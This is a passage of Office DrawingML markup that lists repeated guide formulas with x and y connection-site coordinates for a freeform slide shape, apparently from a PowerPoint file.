              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486586 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 474956 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77640 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 30035 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY89" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY90" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY91" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY92" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486586 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 474956 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
